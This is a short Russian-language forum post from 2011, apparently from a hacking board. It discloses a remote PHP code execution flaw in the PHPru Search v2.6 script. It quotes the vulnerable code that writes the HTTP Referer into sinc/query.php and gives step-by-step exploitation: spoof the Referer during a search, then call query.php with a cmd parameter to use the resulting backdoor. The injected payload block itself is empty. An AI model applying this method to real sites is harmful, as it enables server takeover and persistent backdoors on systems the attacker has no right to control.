29.12.2011, 19:24
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
PHPru Search v.2.6
Произвольное выполнение php кода
Уязвимый код в index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$NEW[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]'^^'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$searchstring[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'^^'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"HTTP_REFERER"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'^^'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$IP[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]PHPruSave[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$NEW[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'sinc/query.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a+'[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Для эксплуатации уязвимости нужно выполнить поиск по сайту с любым кейвордом при этом подделав свой реффер например через плагин tamper data для файрфокса на что то типа такого
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
после чего идем сюда:
Код:
http://127.0.0.1/phprusearch/sinc/query.php?cmd=phpinfo();
и делаем уже с бекдором то что хотим
|
|
|